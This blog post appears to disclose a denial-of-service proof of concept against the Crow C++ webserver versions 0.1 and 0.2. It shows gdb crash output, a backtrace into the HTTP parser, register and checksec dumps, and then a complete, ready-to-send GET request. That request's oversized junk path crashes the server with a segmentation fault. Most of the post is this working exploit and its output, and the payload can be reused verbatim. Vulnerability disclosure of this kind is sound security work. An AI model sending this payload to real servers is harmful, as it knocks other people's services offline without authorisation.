Segmeation fault Denial of Service PoC – Crow webserver v0.1 and v0.2

Posted on by Andrei Agape

Shodan

Crash

~/Projects/crow/build/examples$ gdb -q helloworld
Reading symbols from helloworld...
(No debugging symbols found in helloworld)
(gdb) run
Starting program: /Projects/crow/build/examples/helloworld 
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
[New Thread 0x7ffff7a45700 (LWP 32382)]
(2021-05-09 15:22:13) [INFO    ] Crow/0.1 server is running at 0.0.0.0:18080 using 1 threads
(2021-05-09 15:22:13) [INFO    ] Call `app.loglevel(crow::LogLevel::Warning)` to hide Info level logs.
[New Thread 0x7ffff7244700 (LWP 32383)]

Thread 2 "helloworld" received signal SIGSEGV, Segmentation fault.
[Switching to Thread 0x7ffff7a45700 (LWP 32382)]
__m128i_shift_right (offset=4, 
    value=<error reading variable: Cannot access memory at address 0x5e25262423323160>)
    at ../sysdeps/x86_64/multiarch/varshift.h:27
27    ../sysdeps/x86_64/multiarch/varshift.h: No such file or directory.

Backtrace

(gdb) backtrace
#0  __m128i_shift_right (offset=4, 
    value=<error reading variable: Cannot access memory at address 0x5e25262423323160>)
    at ../sysdeps/x86_64/multiarch/varshift.h:27
#1  __strcspn_sse42 (
    s=0x5e25262423323164 <error: Cannot access memory at address 0x5e25262423323164>, 
    a=<optimized out>) at ../sysdeps/x86_64/multiarch/strcspn-c.c:143
#2  0x00005555555a398e in crow::HTTPParser<crow::Connection<crow::SocketAdaptor, crow::Crow<>> >::on_message_complete(http_parser*) ()
#3  0x00005555555859e9 in http_parser_execute ()
#4  0x00005555555a3ef2 in boost::asio::detail::reactive_socket_recv_op<boost::asio::mutable_buffers_1, crow::Connection<crow::SocketAdaptor, crow::Crow<>>::do_read()::{lambda(boost::system::error_code const&, unsigned long)#1}>::do_complete(void*, boost::asio::detail::scheduler_operation*, boost::system::error_code const&, unsigned long) ()
#5  0x000055555558754d in boost::asio::detail::scheduler::run(boost::system::error_code&) ()
#6  0x000055555559ba35 in crow::Server<crow::Crow<>, crow::SocketAdaptor>::run()::{lambda()#1}::operator()() const ()
#7  0x000055555559bf4d in std::_Function_handler<std::unique_ptr<std::__future_base::_Result_base, std::__future_base::_Result_base::_Deleter> (), std::__future_base::_Task_setter<std::unique_ptr<std::__future_base::_Result<void>, std::__future_base::_Result_base::_Deleter>, std::thread::_Invoker<std::tuple<crow::Server<crow::Crow<>, crow::SocketAdaptor>::run()::{lambda()#1}> >, void> >::_M_invoke(std::_Any_data const&) ()
#8  0x000055555557ed1d in std::__future_base::_State_baseV2::_M_do_set(std::function<std::unique_ptr<std::__future_base::_Result_base, std::__future_base::_Result_base::_Deleter> ()>*, bool*) ()
#9  0x00007ffff7f9a47f in __pthread_once_slow (once_control=0x5555555c80b8, 
    init_routine=0x7ffff7e7cb80 <__once_proxy>) at pthread_once.c:116
#10 0x0000555555589125 in std::thread::_State_impl<std::thread::_Invoker<std::tuple<std::__future_base::_Async_state_impl<std::thread::_Invoker<std::tuple<crow::Server<crow::Crow<>, crow::SocketAdaptor>::run()::{lambda()#1}> >, void>::_Async_state_impl(std::tuple<crow::Server<crow::Crow<>, crow::SocketAdaptor>::run()::{lambda()#1}>&&)::{lambda()#1}> > >::_M_run() ()
#11 0x00007ffff7e7dd84 in ?? () from /lib/x86_64-linux-gnu/libstdc++.so.6
#12 0x00007ffff7f91609 in start_thread (arg=<optimized out>) at pthread_create.c:477
#13 0x00007ffff7cbc293 in clone () at ../sysdeps/unix/sysv/linux/x86_64/clone.S:95

Registers

(gdb) info registers 
rax            0x5e25262423323160  6783870350354690400
rbx            0x7ffff00019a0      140737219926432
rcx            0x7ffff7d4c650      140737351304784
rdx            0x4                 4
rsi            0x4                 4
rdi            0x5e25262423323164  6783870350354690404
rbp            0x7ffff7a44600      0x7ffff7a44600
rsp            0x7ffff7a44588      0x7ffff7a44588
r8             0x5555555a6080      93824992567424
r9             0x7c                124
r10            0x2000004800000001  2305843318451339265
r11            0x7ffff0000080      140737219920000
r12            0x7ffff7a445e0      140737348126176
r13            0x7ffff7a445f0      140737348126192
r14            0x5e25262423323164  6783870350354690404
r15            0x5555555a6084      93824992567428
rip            0x7ffff7d207f8      0x7ffff7d207f8 <__strcspn_sse42+72>
eflags         0x10206             [ PF IF RF ]
cs             0x33                51
ss             0x2b                43
ds             0x0                 0
es             0x0                 0
fs             0x0                 0
gs             0x0                 0

Checksec

./checksec.sh --file ~/Projects/crow/build/examples/helloworld
RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH      FILE
Full RELRO      Canary found      NX enabled    PIE enabled     No RPATH   No RUNPATH   /home/hayden/Projects/crow/build/examples/helloworld

Payload PoC

GET /12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^&^(-=0p[;,./passwd/id12#$&%^& HTTP/1.1
Content-Length: 0
Connection: close

References

Published by Andrei Agape

Leave a Reply

Fill in your details below or click an icon to log in:

Gravatar
WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Cancel

Connecting to %s